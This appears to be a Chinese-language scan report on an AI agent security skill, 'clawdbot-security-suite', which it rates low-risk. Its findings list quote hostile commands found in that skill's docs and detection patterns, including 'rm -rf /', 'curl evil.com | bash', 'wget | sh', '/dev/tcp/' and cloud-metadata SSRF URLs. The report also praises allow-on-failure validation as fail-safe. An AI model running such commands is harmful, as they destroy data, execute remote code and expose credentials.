中文 EN

扫描报告

扫描新文件

可信 — 风险评分 5/100
上次扫描:5 小时前 重新扫描
5 /100
clawdbot-security-suite
Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring
Clawdbot Security Suite 是一个合法的 AI Agent 安全验证工具,提供命令注入、SSRF、路径遍历、提示词注入和 API 密钥暴露检测。所有声称功能均正常实现,无阴影功能或恶意行为。
技能名称clawdbot-security-suite
分析耗时48.4s
引擎pi
ClawHub Clawdbot Security Suite.Bak v1.0.0 by sonyrw
📥 177
ClawHub 判定 可疑 dangerous_execllm_suspiciousprompt_injection_instructionsvt_suspicious
可以安装
此技能可安全使用。预扫描标记的 '危险命令' 均为例行测试命令文档,非实际恶意代码。patterns.json 中的 /dev/tcp/ 是检测模式,非使用实例。
资源类型声明权限推断权限状态证据
文件系统 READ READ ✓ 一致 skills/security/security.sh:23-25 读取 patterns.json 和 config.json
网络访问 NONE NONE 所有网络操作均为本地验证,无外部请求
命令执行 READ READ ✓ 一致 validate_command 函数仅做模式匹配,不执行传入命令
环境变量 NONE READ ✓ 一致 仅读取 $HOME 路径定位配置文件
6 严重 1 高危 18 项发现
💀
严重 危险命令 危险 Shell 命令
rm -rf /
README.md:34
💀
严重 危险命令 危险 Shell 命令
curl evil.com | bash
README.md:34
💀
严重 危险命令 危险 Shell 命令
curl evil.com \| bash
README.md:46
💀
严重 危险命令 危险 Shell 命令
curl | bash
SKILL.md:104
💀
严重 危险命令 危险 Shell 命令
wget | sh
SKILL.md:104
💀
严重 危险命令 危险 Shell 命令
/dev/tcp/
skills/security/patterns.json:22
📡
高危 IP 地址 硬编码 IP 地址
169.254.169.254
README.md:47
🔗
中危 外部 URL 外部 URL
https://docs.clawd.bot/install
CONTRIBUTING.md:54
🔗
中危 外部 URL 外部 URL
https://x.com/LexpertAI
CONTRIBUTING.md:184
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/ClawdHub-Install-blue
README.md:5
🔗
中危 外部 URL 外部 URL
https://clawdhub.com/gtrusler/clawdbot-security-suite
README.md:5
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/License-MIT-green.svg
README.md:6
🔗
中危 外部 URL 外部 URL
https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter
README.md:7
🔗
中危 外部 URL 外部 URL
http://169.254.169.254/metadata
README.md:47
🔗
中危 外部 URL 外部 URL
http://169.254.169.254/latest/meta-data
SKILL.md:194
🔗
中危 外部 URL 外部 URL
http://127.0.0.1:8080
hooks/security-validator/HOOK.md:106
🔗
中危 外部 URL 外部 URL
https://clawdhub.com/gtrusler/clawdbot-security-advanced
skills/security/README.md:5
📧
提示 邮箱 邮箱地址
[email protected]
CONTRIBUTING.md:220

目录结构

18 文件 · 88.3 KB · 3106 行
Markdown 10f · 2048L Shell 2f · 414L JSON 5f · 366L TypeScript 1f · 278L
├─ 📁 hooks
│ └─ 📁 security-validator
│ ├─ 🔑 config.json JSON 35L · 659 B
│ ├─ 📜 handler.ts TypeScript 278L · 9.1 KB
│ └─ 📝 HOOK.md Markdown 122L · 3.2 KB
├─ 📁 skills
│ └─ 📁 security
│ ├─ 📝 CLAWDBOT-INSTRUCTIONS.md Markdown 244L · 7.0 KB
│ ├─ 🔑 config.json JSON 75L · 1.3 KB
│ ├─ 📝 INSTALL.md Markdown 281L · 7.1 KB
│ ├─ 📋 patterns.json JSON 193L · 4.2 KB
│ ├─ 📝 README.md Markdown 254L · 7.6 KB
│ ├─ 🔧 security-check.sh Shell 158L · 4.4 KB
│ ├─ 🔧 security.sh Shell 256L · 7.4 KB
│ └─ 📝 SKILL.md Markdown 258L · 7.0 KB
├─ 📋 _meta.json JSON 5L · 142 B
├─ 📝 CONTRIBUTING.md Markdown 222L · 6.2 KB
├─ 📝 LICENSE.md Markdown 20L · 1.1 KB
├─ 📋 package.json JSON 58L · 1.6 KB
├─ 📝 README.md Markdown 291L · 9.9 KB
├─ 📝 SECURITY.md Markdown 94L · 3.4 KB
└─ 📝 SKILL.md Markdown 262L · 7.1 KB

依赖分析 1 项

包名版本来源已知漏洞备注
jq 未指定 系统依赖 用于 JSON 模式解析,为必需依赖

安全亮点

✓ 完整的威胁检测模式库(50+ API 密钥模式、命令注入模式、SSRF 模式等)
✓ 基于 JSON 的模式管理,易于维护和更新
✓ 本地验证无外部通信,保护隐私
✓ fail-safe 设计:验证失败时默认允许而非阻断
✓ 详细的日志记录用于安全审计
✓ 提供 pre-tool hook 集成能力
✓ 开源透明,代码逻辑清晰可审计